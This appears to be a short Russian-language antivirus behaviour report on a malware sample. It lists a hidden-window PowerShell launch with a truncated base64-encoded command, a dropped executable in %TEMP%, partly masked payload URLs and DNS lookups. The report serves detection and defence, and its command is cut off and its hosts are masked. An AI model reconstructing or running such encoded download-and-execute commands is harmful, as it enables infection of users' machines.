Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAHEANQA1AGwAYwBoAD0AJwBPADMAbwBsAGcAYQBtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQByAEkAYABUAFkAcABgAFIATwB0AG8AQwBvAGwAIgAgAD0AIAAnAH...
- %TEMP%\pgwx.exe
- %TEMP%\pgwx.exe
- http://me#####litanelites.com/wp/yMuc41730/
- http://me#####litanelites.com/cgi-sys/suspendedpage.cgi
- http://se##ice.com/bible/_session/rqc5g/
- http://cm###exham.com/video/Ji81477/
- DNS ASK 20.##xtt.com
- DNS ASK me#####litanelites.com
- DNS ASK ca##ned.com
- DNS ASK se##ice.com
- DNS ASK cm###exham.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABBAHEANQA1AGwAYwBoAD0AJwBPADMAbwBsAGcAYQBtACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAVQByAEkAYABUAFkAcABgAFIATwB0AG8AQwBvAGwAIgAgAD0AIAAnAH...' (со скрытым окном)